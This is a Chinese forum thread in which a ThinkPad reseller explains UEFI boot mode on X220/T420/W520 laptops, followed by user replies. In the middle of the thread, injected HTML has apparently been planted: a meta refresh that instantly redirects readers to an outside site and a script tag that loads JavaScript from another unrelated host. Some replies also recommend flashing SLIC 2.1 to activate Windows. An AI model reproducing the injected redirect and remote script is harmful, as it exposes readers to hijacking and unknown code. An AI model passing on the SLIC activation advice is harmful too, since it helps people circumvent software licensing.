开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

即日起开始开始UEFI安装模式安装系统

Thinkpad X220,T420,W520这一代已经支持UEFI的启动模式,UEFI bios 比着传统的bios,有以下的不同:
1. 编码99%都是由C语言完成(BIOS是由汇编语言写成的);   
2. 采用了Driver/protocal的新方式,不再使用中断/端口;   
3. 采用Flat mode(不再支持x86模式,也就是说不能再使用DOS了);   
4. 输出改为Removable Binary Drivers,不再是单纯的二进制code;   
5. 操作系统的启动不再是调用Int19,而是直接利用protocol/device Path;   
6. 可以很方便进行第三方的开发,不受ROM大小限制。   
7. 弥补BIOS对新硬件的支持不足的毛病

最大的优势就是开机速度的提升,建议购买了ssd的客户选择UEFI启动,来压榨SSD.

UEFI BIOS不支持32位系统,只能安装64位系统,敬请留意。

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

顶一个,要得。
我刚刚装了SSD,如何应用这种技术?是不是要重新安装系统?
完全不懂
我就只要机子能用就行
是不是这个功能要在哪里开启?BIOS设置里?
设置过了,似乎不兼容SSD
新技术,不知如何安装
什么情况 刚装的机 北京有吗
新知识,需要普及
貌似一点也看不懂。。。
慢慢掌握吧
treaven 发表于 2011-10-5 19:53
设置过了,似乎不兼容SSD

设置后需要重新安装系统。肯定是兼容ssd
/饭_格格吴 发表于 2011-10-5 23:58
什么情况 刚装的机 北京有吗

目前我在上海店,我是提供这种安装模式的。
ibrave 发表于 2011-10-6 12:01
目前我在上海店,我是提供这种安装模式的。

这种安装系统之后怎么样才能激活呢?
treaven 发表于 2011-10-6 14:00
这种安装系统之后怎么样才能激活呢?

刷slic2.1激活。
看上去还挺麻烦
ibrave 发表于 2011-10-6 17:06
刷slic2.1激活。

是指oem 的win7 吧?
这个技术不错啊
新的东西总需要尝试的~
这么快就上了,可惜离的太远~~
需要刷一下bios么?升级到最新的?
ibrave 发表于 2011-10-6 17:06
刷slic2.1激活。

新旧版本的bios刷slic有什么不同吗。
旧版下我刷过好多次,新版的没有机会。先学习一下备用。
期待LZ出技术贴。
我的T410用不了这技术,只能学习一下了!
不高兴在费劲了   下次换的时候再说